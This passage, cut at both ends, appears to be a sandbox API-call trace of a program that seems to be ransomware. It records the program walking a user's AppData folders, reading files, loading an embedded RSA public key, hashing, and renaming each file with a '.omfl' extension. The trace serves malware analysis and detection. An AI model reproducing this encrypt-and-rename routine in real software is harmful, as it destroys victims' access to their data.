HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0134.915] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0134.915] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f8358 [0134.916] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0cc8 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b888 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.916] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.916] PathFindFileNameW (pszPath="") returned="" [0134.917] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0134.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.917] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=32768) returned 1 [0134.917] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.962] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3220) returned 1 [0134.963] CryptCreateHash (in: hProv=0x49d3220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.963] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.963] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.974] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.974] GetLastError () returned 0x0 [0134.974] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.974] CryptReleaseContext (hProv=0x49d3220, dwFlags=0x0) returned 1 [0134.974] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.974] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.975] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.070] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.omfl")) returned 1 [0135.072] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.072] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.072] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.073] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.073] PathFindFileNameW (pszPath="") returned="" [0135.074] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.074] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0135.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0135.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0135.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.075] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.075] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.075] PathFindFileNameW (pszPath="") returned="" [0135.076] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0135.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.077] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=581730) returned 1 [0135.077] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.080] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.080] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0135.095] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2ef0) returned 1 [0135.096] CryptCreateHash (in: hProv=0x49d2ef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.097] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.097] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.097] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.097] GetLastError () returned 0x0 [0135.097] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.097] CryptReleaseContext (hProv=0x49d2ef0, dwFlags=0x0) returned 1 [0135.097] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.097] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.097] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.099] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.omfl")) returned 1 [0135.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0135.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.102] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=185344) returned 1 [0135.102] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.105] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.105] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0135.107] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.107] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x25805, lpOverlapped=0x0) returned 1 [0135.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0135.109] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2ef0) returned 1 [0135.110] CryptCreateHash (in: hProv=0x49d2ef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.110] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.111] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.111] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.111] GetLastError () returned 0x0 [0135.111] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.111] CryptReleaseContext (hProv=0x49d2ef0, dwFlags=0x0) returned 1 [0135.111] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.111] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.111] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.111] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.111] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.113] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.omfl")) returned 1 [0135.114] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.114] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.114] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.115] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6d48 | out: hHeap=0x4970000) returned 1 [0135.115] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0135.116] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0135.116] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0135.116] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3220 | out: hHeap=0x4970000) returned 1 [0135.116] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.116] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.116] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.117] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.117] PathFindFileNameW (pszPath="") returned="" [0135.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned=".properties" [0135.118] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.118] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=719) returned 1 [0135.118] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.121] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x2a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.121] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0135.123] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3220) returned 1 [0135.124] CryptCreateHash (in: hProv=0x49d3220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.124] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.124] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.125] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.125] GetLastError () returned 0x0 [0135.125] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.125] CryptReleaseContext (hProv=0x49d3220, dwFlags=0x0) returned 1 [0135.125] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.125] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.125] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.125] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.125] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.126] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.omfl")) returned 1 [0135.126] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.126] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.126] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.128] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7482788 | out: hHeap=0x4970000) returned 1 [0135.128] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0135.128] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.128] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0135.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0135.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0135.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.129] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.129] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.129] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.129] PathFindFileNameW (pszPath="") returned="" [0135.129] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0135.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.134] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=25340970) returned 1 [0135.134] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.137] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.137] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0135.143] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, 